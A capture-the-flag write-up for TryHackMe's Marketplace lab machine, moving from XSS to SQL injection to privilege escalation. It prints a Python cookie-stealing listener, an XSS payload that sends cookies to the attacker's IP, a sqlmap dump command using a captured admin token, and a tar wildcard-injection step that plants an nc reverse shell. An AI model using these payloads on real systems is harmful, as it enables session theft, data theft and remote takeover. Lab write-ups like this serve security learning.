The Marketplace CTF Writeup on TryHackMe

, , , , ,

Before all

Coffee or tea or whale?
well…you can’t order the last one 🤣

Victim IP : 10.10.65.93
My IP : 10.8.211.34

Write Up

RECON

Nothing found but a port : 32768 with the same function as port : 80.

Web Exploitation

This is a simple market website, you can register your account and add new items.

XSS

After I tried out the add function, I noticed that there’s a XSS vulnerabilities:
image
Both of the alert worked, so it’s time to report the payload to admin.
Though there’s no webhook.site to use, it’s still feasible to set up a simple http server with python.
Source: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/env python
# POC for cookie stealing through XSS
# Should work with:
# <script>
#   image = new Image();
#   image.src='http://X.X.X.X:8888/?'+document.cookie;
# </script>

# Written by Ahmed Shawky @lnxg33k

from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from urlparse import urlparse, parse_qs
from datetime import datetime


class MyHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        query_components = parse_qs(urlparse(self.path).query)
        print ""
        print "%s - %s\t%s" % (
            datetime.now().strftime("%Y-%m-%d %I:%M %p"),
            self.client_address[0],
            self.headers['user-agent'])
        print "-------------------"*6
        for k, v in query_components.items():
            print "%s\t\t\t%s" % (k.strip(), v)

        # print query_components
        # self.send_response(500)

        # self.send_header("Content-type", "text/html")
        # self.end_headers()
        # self.wfile.write(c)

        return

    def log_message(self, format, *args):
        return

if __name__ == "__main__":
    try:
        server = HTTPServer(('0.0.0.0', 8888), MyHandler)
        print('Started http server')
        server.serve_forever()
    except KeyboardInterrupt:
        print('^C received, shutting down server')
        server.socket.close()

XSS Payload: 

1
<script> image = new Image(); image.src='http://10.8.211.34:8888/?'+document.cookie; </script>

image
image

SQL Injection

After getting the admin’s cookie, I found out a sql injection in admin panel.
image

sqlmap:
sqlmap --url "http://10.10.65.93/admin?user=1" --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDA2MjkxMDN9.Lj9L2zuNLSAQE3btbfm_XZTgbJHKRPH7HOWk-fSbgyE' --technique=U --delay=2 --dump
image

And here’s the ssh password~

image

image

Privilege Escalation

Wildcard Injection

Here for more informations:link 

1
2
3
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.211.34 5130 >/tmp/f'>shell.sh
echo "">'--checkpoint-action=exec=sh shell.sh'
echo "">--checkpoint=1

image

Get shell on 5130:
image
Escalated to user michael.

Docker Escalation

GTFOBins
image
Get flag!!!
image

After all

Just a little bit tire and nervous now ><.